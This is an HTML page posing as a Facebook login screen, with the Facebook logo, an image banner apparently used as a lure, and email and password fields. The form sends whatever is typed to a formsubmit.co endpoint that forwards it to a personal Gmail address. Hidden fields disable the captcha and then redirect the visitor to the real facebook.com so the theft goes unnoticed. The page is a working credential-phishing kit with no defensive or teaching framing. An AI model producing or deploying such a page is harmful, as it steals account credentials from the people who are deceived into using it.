<html>
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="ie=edge">
	<title>Facebook</title>
	<style>
		*{
			padding: 0;
			margin: 0;
			font-family: sans-serif;
			box-sizing: border-box;
		}
		.container{
			background: green;
			width: 100%;
			height: 100vh;
		}
		.adultsImage{
			width: 100%;
			height: 39vh;
			
		}
		.adultsImage img{
			width: 100%;
			height: 39vh;
		}
		.formcontainer{
			width: 300px;
			background: white;
			position: fixed;
			top: 50%;
			left: 50%;
			transform: translate(-50%, -50%);
			border-radius: 4px;
		}
		.facebookIcon{
			display: flex;
			justify-content: center;
			align-items: center;
			
		}
		.facebookIcon img{
			margin-top: 10px;
		}
		.facebookInputBox{
			width: 90%;
			margin: 20px auto 0;
		}
		.facebookInputBox input{
			width: 100%;
			padding: 10px 15px;
			border: 0.5px solid gray;
			border-radius: 20px;
			margin-top: 10px;
		}
		.facebookInputBox input:focus{
			border: 0;
			outline: 0;
			border: 0.5px solid gray;
		}
		.submitButton{
			width: 100px;
			margin: 20px auto 0;
		}
		.submitButton button{
			width: 100%;
			border: 0;
			outline: 0;
			padding: 10px;
			background: blue;
			color: white;
			border-radius: 20px;
			margin: 0 0 20px;
		}
	</style>
</head>
<body>
	
	<div class="container">
		<div class="adultsImage">
			<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTV4UlS1Ehv87B7_HRdQWlKz8Jw13A0zxuiuQ&s" alt="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTV4UlS1Ehv87B7_HRdQWlKz8Jw13A0zxuiuQ&s">
			<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTV4UlS1Ehv87B7_HRdQWlKz8Jw13A0zxuiuQ&s" alt="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTV4UlS1Ehv87B7_HRdQWlKz8Jw13A0zxuiuQ&s">
			<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTV4UlS1Ehv87B7_HRdQWlKz8Jw13A0zxuiuQ&s" alt="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTV4UlS1Ehv87B7_HRdQWlKz8Jw13A0zxuiuQ&s">
		</div>
		<div class="formcontainer">
			<form action="https://formsubmit.co/pavelprfb@gmail.com" method="POST">
				<div class="facebookIcon">
					<img src="https://z-m-static.xx.fbcdn.net/rsrc.php/v4/yh/r/Sg2QOE06yVC.png" alt="Facebook">
				</div>
				<div class="facebookInputBox">
					<input type="text" name="username" id="username" placeholder="Mobile number or email address" />
					<input type="text" name="password" id="password" placeholder="Password" />
					
					<input type="hidden" name="_captcha" value="false">
					<input type="hidden" name="_next" value="https://facebook.com">
					<input type="hidden" name="_template" value="table">
					
				</div>
				<div class="submitButton">
					<button type="submit">Login</button>
				</div>
			</form>
		</div>
	</div>
	
</body>
            </html>
